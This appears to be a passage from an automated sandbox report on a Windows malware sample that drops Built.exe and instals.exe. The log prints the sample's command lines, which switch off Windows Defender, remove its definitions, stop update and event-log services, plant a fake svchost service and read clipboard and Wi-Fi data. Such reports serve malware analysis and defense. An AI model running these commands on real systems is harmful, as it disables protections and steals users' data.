                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C6C1C5_2_00007FFDF10C6C1C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C4B565_2_00007FFDF10C4B56
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C275C5_2_00007FFDF10C275C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF144B3705_2_00007FFDF144B370
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF14512305_2_00007FFDF1451230
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF150E1F05_2_00007FFDF150E1F0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF15805205_2_00007FFDF1580520
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF151F7D05_2_00007FFDF151F7D0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF157FA005_2_00007FFDF157FA00
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF15111D05_2_00007FFDF15111D0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF15622305_2_00007FFDF1562230
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF15061FB5_2_00007FFDF15061FB
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE0C0A1BB05_2_00007FFE0C0A1BB0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE0C0A53A05_2_00007FFE0C0A53A0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE0C0A2FF05_2_00007FFE0C0A2FF0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE101D3E605_2_00007FFE101D3E60
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE101DC7A05_2_00007FFE101DC7A0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE101D2EB05_2_00007FFE101D2EB0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE101D60C05_2_00007FFE101D60C0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE101D3BD05_2_00007FFE101D3BD0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9B98302715_2_00007FFD9B983027
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FF626642910 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C24B9 appears 79 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C1EF1 appears 1323 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C483B appears 115 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C2734 appears 461 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C300D appears 55 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C6988 appears 47 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FF626642710 appears 104 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C2A04 appears 112 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF14412EE appears 51 times
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: String function: 00007FFDF10C4057 appears 697 times
                Source: rar.exe.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: 47SXvEQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: Commandline size = 3647
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: Commandline size = 3647Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                Source: 47SXvEQ.exeStatic PE information: Section: ypfntliq ZLIB complexity 0.9943648107848923
                Source: libcrypto-1_1.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
                Source: libssl-1_1.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
                Source: python310.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989605894183168
                Source: sqlite3.dll.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9973472980934018
                Source: unicodedata.pyd.4.drStatic PE information: Section: UPX1 ZLIB complexity 0.9940549303016454
                Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.mine.winEXE@207/55@4/2
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:332:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\Built.exeMutant created: \Sessions\1\BaseNamedObjects\g
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7792:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile created: C:\Users\user\AppData\Local\Temp\instals.exeJump to behavior
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Built.exeBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: Built.exeBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: Built.exeBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: Built.exeBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: Built.exeBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: Built.exeBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: 47SXvEQ.exeReversingLabs: Detection: 21%
                Source: 47SXvEQ.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: Built.exeString found in binary or memory: set-addPolicy
                Source: Built.exeString found in binary or memory: id-cmc-addExtensions
                Source: Built.exeString found in binary or memory: --help
                Source: Built.exeString found in binary or memory: --help
                Source: Built.exeString found in binary or memory: can't send non-None value to a just-started generator
                Source: unknownProcess created: C:\Users\user\Desktop\47SXvEQ.exe "C:\Users\user\Desktop\47SXvEQ.exe"
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess created: C:\Users\user\AppData\Local\Temp\instals.exe "C:\Users\user\AppData\Local\Temp\instals.exe"
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NPYIAYNC"
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NPYIAYNC"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: unknownProcess created: C:\ProgramData\Microsoft\svchost.exe C:\ProgramData\Microsoft\svchost.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                Source: C:\ProgramData\Microsoft\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 